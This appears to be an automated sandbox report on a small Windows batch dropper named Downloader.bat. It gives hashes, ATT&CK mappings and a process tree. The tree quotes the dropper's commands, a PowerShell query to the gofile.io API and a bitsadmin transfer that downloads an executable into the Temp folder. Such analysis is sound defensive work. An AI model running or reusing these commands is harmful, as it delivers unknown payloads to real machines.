56fba807f509d7e6caea93447bfa9746ca0332a23216936598849b049a49c65d

Analysis

max time kernel
117s
max time network
118s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
26/03/2025, 23:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Downloader.bat
Size

564B
MD5

e9425888abbdf846bcee0d7ee271e526
SHA1

76e4f8a62ce5a0295347b423930f2b6c1bae955a
SHA256

56fba807f509d7e6caea93447bfa9746ca0332a23216936598849b049a49c65d
SHA512

647e9ad95d3cdd180fcb383195d8bc4f708bfad10251232ec01333d1e94e696f5d7e987ea8160790f134ae6f7893d0a5467848a4ee94f21b4ba4e264d2dd6853

Score

8^/10

dropper execution

Malware Config

Signatures

Download via BitsAdmin 1 TTPs 1 IoCs

dropper

BITS Jobs

T1197

pid	Process
2744	bitsadmin.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2796	powershell.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2796	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2796	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 2124 wrote to memory of 2792	2124	cmd.exe	31
PID 2124 wrote to memory of 2792	2124	cmd.exe	31
PID 2124 wrote to memory of 2792	2124	cmd.exe	31
PID 2792 wrote to memory of 2796	2792	cmd.exe	32
PID 2792 wrote to memory of 2796	2792	cmd.exe	32
PID 2792 wrote to memory of 2796	2792	cmd.exe	32
PID 2124 wrote to memory of 2744	2124	cmd.exe	33
PID 2124 wrote to memory of 2744	2124	cmd.exe	33
PID 2124 wrote to memory of 2744	2124	cmd.exe	33

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Downloader.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2124
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -command "(Invoke-RestMethod 'https://api.gofile.io/getServer').data.server"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2792
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "(Invoke-RestMethod 'https://api.gofile.io/getServer').data.server"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2796
- C:\Windows\system32\bitsadmin.exe
  bitsadmin /transfer gofiledownload /download /priority normal "https://+.gofile.io/download/d38nvZ" "C:\Users\Admin\AppData\Local\Temp\downloaded_file.exe"
  2⤵
  - Download via BitsAdmin
  PID:2744

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

BITS Jobs

T1197

Privilege Escalation

Defense Evasion

BITS Jobs

T1197

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2796-4-0x000007FEF64CE000-0x000007FEF64CF000-memory.dmp

Filesize
4KB

Download
memory/2796-5-0x000000001B7B0000-0x000000001BA92000-memory.dmp

Filesize
2.9MB

Download
memory/2796-9-0x000007FEF6210000-0x000007FEF6BAD000-memory.dmp

Filesize
9.6MB

Download
memory/2796-8-0x000007FEF6210000-0x000007FEF6BAD000-memory.dmp

Filesize
9.6MB

Download
memory/2796-7-0x000007FEF6210000-0x000007FEF6BAD000-memory.dmp

Filesize
9.6MB

Download
memory/2796-6-0x0000000001E70000-0x0000000001E78000-memory.dmp

Filesize
32KB

Download
memory/2796-10-0x000007FEF6210000-0x000007FEF6BAD000-memory.dmp

Filesize
9.6MB

Download
memory/2796-11-0x000007FEF6210000-0x000007FEF6BAD000-memory.dmp

Filesize
9.6MB

Download